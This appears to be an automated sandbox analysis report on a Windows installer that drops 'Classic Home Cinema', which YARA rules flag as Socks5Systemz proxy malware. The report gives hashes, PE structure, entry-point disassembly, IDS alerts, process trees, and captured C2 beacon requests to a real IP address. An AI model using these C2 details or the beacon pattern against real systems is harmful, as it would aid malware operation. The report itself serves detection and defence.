                                                                                      SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                      SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                      SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):6144
                                                                                      Entropy (8bit):4.289297026665552
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                      MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                      SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                      SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                      SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23312
                                                                                      Entropy (8bit):4.596242908851566
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                      MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                      SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                      SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                      SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\EQ5Vcf19u8.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):706560
                                                                                      Entropy (8bit):6.506375340710484
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:GTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+pIq5MRxyF:WPcYn5c/rPx37/zHBA6pFptZ1CEoqMRU
                                                                                      MD5:BCF2F0322A00DC0DE9B0CAE39438B480
                                                                                      SHA1:81D7CB7F7F83A6CADAABC4D407C94B9C01C6BF7B
                                                                                      SHA-256:D450B34EFA2D2E162CD0C79C8B6BE88D035B84F0E25EC28C52B2A2068DA3C701
                                                                                      SHA-512:B0CD6513B174AED0049206F490A9D15F9C7814C79960041EC2BA8A9EA6C171D6138F33BD544E917FB38E653731D57D57058DCC2C29D22D18198299F901E3DF7F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.997628924855278
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 98.32%
                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                      File name:EQ5Vcf19u8.exe
                                                                                      File size:3'335'813 bytes
                                                                                      MD5:849f1e782aef6fc885225f115db43236
                                                                                      SHA1:2e790be949272e97d9fd71b7a6ea34140f08fb16
                                                                                      SHA256:9fbf70243a3e4aca45a6d0af87749833e506c5a3eacdbc449525bc5f62835ba6
                                                                                      SHA512:5424569f06069f8051516acb203f3e4eb889c0417b0a2552ea9aa992c4467e684f6b09ad78812b1a76de6f6a8722cad5427cef4a860799ac449b6a62d8c82b87
                                                                                      SSDEEP:98304:M4TCwmZJtRTroyMXl2ZT3nt+kRDVBAGhYhbuXBQTu2:Mrria3t+sD8GhObuxz2
                                                                                      TLSH:A2F533D7A2A9D27DD4F7A0F0852F971E9633392A1E755038268D2ACE8FF3619484C7C4
                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                      Icon Hash:2d2e3797b32b2b99
                                                                                      Entrypoint:0x40a5f8
                                                                                      Entrypoint Section:CODE
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:1
                                                                                      OS Version Minor:0
                                                                                      File Version Major:1
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:1
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      add esp, FFFFFFC4h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor eax, eax
                                                                                      mov dword ptr [ebp-10h], eax
                                                                                      mov dword ptr [ebp-24h], eax
                                                                                      call 00007F35604E3D33h
                                                                                      call 00007F35604E4F3Ah
                                                                                      call 00007F35604E51C9h
                                                                                      call 00007F35604E526Ch
                                                                                      call 00007F35604E720Bh
                                                                                      call 00007F35604E9B76h
                                                                                      call 00007F35604E9CDDh
                                                                                      xor eax, eax
                                                                                      push ebp
                                                                                      push 0040ACC9h
                                                                                      push dword ptr fs:[eax]
                                                                                      mov dword ptr fs:[eax], esp
                                                                                      xor edx, edx
                                                                                      push ebp
                                                                                      push 0040AC92h
                                                                                      push dword ptr fs:[edx]
                                                                                      mov dword ptr fs:[edx], esp
                                                                                      mov eax, dword ptr [0040C014h]
                                                                                      call 00007F35604EA78Bh
                                                                                      call 00007F35604EA376h
                                                                                      cmp byte ptr [0040B234h], 00000000h
                                                                                      je 00007F35604EB26Eh
                                                                                      call 00007F35604EA888h
                                                                                      xor eax, eax
                                                                                      call 00007F35604E4A29h
                                                                                      lea edx, dword ptr [ebp-10h]
                                                                                      xor eax, eax
                                                                                      call 00007F35604E781Bh
                                                                                      mov edx, dword ptr [ebp-10h]
                                                                                      mov eax, 0040CE28h
                                                                                      call 00007F35604E3DCAh
                                                                                      push 00000002h
                                                                                      push 00000000h
                                                                                      push 00000001h
                                                                                      mov ecx, dword ptr [0040CE28h]
                                                                                      mov dl, 01h
                                                                                      mov eax, 0040738Ch
                                                                                      call 00007F35604E80AAh
                                                                                      mov dword ptr [0040CE2Ch], eax
                                                                                      xor edx, edx
                                                                                      push ebp
                                                                                      push 0040AC4Ah
                                                                                      push dword ptr fs:[edx]
                                                                                      mov dword ptr fs:[edx], esp
                                                                                      call 00007F35604EA7E6h
                                                                                      mov dword ptr [0040CE34h], eax
                                                                                      mov eax, dword ptr [0040CE34h]
                                                                                      cmp dword ptr [eax+0Ch], 00000000h
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x110000x2c000x2c0083e09258de55f10b9aaa4a81ee5fc40aFalse0.3259055397727273data4.495073399157993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                      RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                      RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                      RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                      RT_STRING0x125740x2f2data0.35543766578249336
                                                                                      RT_STRING0x128680x30cdata0.3871794871794872
                                                                                      RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                      RT_STRING0x12e440x68data0.75
                                                                                      RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                      RT_STRING0x12f600xaedata0.5344827586206896
                                                                                      RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                      RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                      RT_VERSION0x1307c0x4f4dataEnglishUnited States0.2634069400630915
                                                                                      RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                                      DLLImport
                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                      user32.dllMessageBoxA
                                                                                      oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                      kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                      user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                      comctl32.dllInitCommonControls
                                                                                      advapi32.dllAdjustTokenPrivileges
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      DutchNetherlands
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-23T11:49:10.321846+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449887188.119.66.185443TCP
                                                                                      2024-12-23T11:49:11.133576+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449887188.119.66.185443TCP
                                                                                      2024-12-23T11:49:16.153824+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449904188.119.66.185443TCP
                                                                                      2024-12-23T11:49:16.849386+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449904188.119.66.185443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 23, 2024 11:49:08.657114983 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:08.657170057 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:08.657253027 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:08.672348976 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:08.672379971 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:10.321713924 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:10.321846008 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:10.371169090 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:10.371207952 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:10.371640921 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:10.371704102 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:10.375396013 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:10.419352055 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:11.133641958 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:11.133698940 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:11.133713007 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:11.133831024 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:11.142443895 CET49887443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:11.142492056 CET44349887188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:11.149705887 CET498932024192.168.2.431.214.157.206
                                                                                      Dec 23, 2024 11:49:11.269265890 CET20244989331.214.157.206192.168.2.4
                                                                                      Dec 23, 2024 11:49:11.269330025 CET498932024192.168.2.431.214.157.206
                                                                                      Dec 23, 2024 11:49:11.269378901 CET498932024192.168.2.431.214.157.206
                                                                                      Dec 23, 2024 11:49:11.388827085 CET20244989331.214.157.206192.168.2.4
                                                                                      Dec 23, 2024 11:49:11.388874054 CET498932024192.168.2.431.214.157.206
                                                                                      Dec 23, 2024 11:49:11.508384943 CET20244989331.214.157.206192.168.2.4
                                                                                      Dec 23, 2024 11:49:12.509660959 CET20244989331.214.157.206192.168.2.4
                                                                                      Dec 23, 2024 11:49:12.557320118 CET498932024192.168.2.431.214.157.206
                                                                                      Dec 23, 2024 11:49:14.511818886 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:14.511936903 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:14.512053967 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:14.512304068 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:14.512326002 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:16.153764009 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:16.153824091 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:16.154299021 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:16.154309034 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:16.154578924 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:16.154586077 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:16.849389076 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:16.849457026 CET44349904188.119.66.185192.168.2.4
                                                                                      Dec 23, 2024 11:49:16.849539995 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:16.849694967 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:16.849694967 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:17.151098013 CET49904443192.168.2.4188.119.66.185
                                                                                      Dec 23, 2024 11:49:17.151160955 CET44349904188.119.66.185192.168.2.4
                                                                                      • 188.119.66.185
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449887188.119.66.1854437640C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 10:49:10 UTC283OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda3a2119db388a HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                      Host: 188.119.66.185
                                                                                      2024-12-23 10:49:11 UTC200INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Mon, 23 Dec 2024 10:49:10 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      X-Powered-By: PHP/7.4.33
                                                                                      2024-12-23 10:49:11 UTC686INData Raw: 32 61 32 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 63 32 37 62 36 62 63 38 66 38 30 32 32 34 63 62 64 33 62 63 31 39 30 32 34 39 66 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 32 63 61 32 39 37 37 64 33 65 61 35 33 63 36 38 38 66 65 34 66 64 64 64 33 39 66 35 35 61 63 62 64 66 35 63 35 30 61 31 64 63 36 64 35 30 37 30 30 64 63 33 32 32 36 30 37 64 32 33 32 38 39 64 65 64 33 39 34 35 64 34 38 63 32 37 37 33 63 65 37 64 63 30 32 35 34 37 31 31 32 37 30 63 66 65 64 31 37 37 36 62 33 66 30 35 66 61 65 65 65 65 30 35 33 61 64 37 63 64 38 63 63 32 32 65 62 66 37 63 37 66 32 34 62 31 36 38 38 35 32 39 62 33 65 61 66 33 34
                                                                                      Data Ascii: 2a28b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b2ca2977d3ea53c688fe4fddd39f55acbdf5c50a1dc6d50700dc322607d23289ded3945d48c2773ce7dc0254711270cfed1776b3f05faeeee053ad7cd8cc22ebf7c7f24b1688529b3eaf34


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449904188.119.66.1854437640C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-23 10:49:16 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946e44be43869e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73989d4da9c5b HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                      Host: 188.119.66.185
                                                                                      2024-12-23 10:49:16 UTC200INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Mon, 23 Dec 2024 10:49:16 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      X-Powered-By: PHP/7.4.33
                                                                                      2024-12-23 10:49:16 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: e8b723663ec13250


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:05:47:04
                                                                                      Start date:23/12/2024
                                                                                      Path:C:\Users\user\Desktop\EQ5Vcf19u8.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\EQ5Vcf19u8.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:3'335'813 bytes
                                                                                      MD5 hash:849F1E782AEF6FC885225F115DB43236
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:1
                                                                                      Start time:05:47:04
                                                                                      Start date:23/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp" /SL5="$20478,3086842,56832,C:\Users\user\Desktop\EQ5Vcf19u8.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:706'560 bytes
                                                                                      MD5 hash:BCF2F0322A00DC0DE9B0CAE39438B480
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.3556080703.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:2
                                                                                      Start time:05:47:05
                                                                                      Start date:23/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe" -i
                                                                                      Imagebase:0x400000
                                                                                      File size:2'776'237 bytes
                                                                                      MD5 hash:765448A33166E70D7C75392D7E8FC161
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.3556027586.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000000.1706052559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:21.4%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:2.4%
                                                                                        Total number of Nodes:1520
                                                                                        Total number of Limit Nodes:22
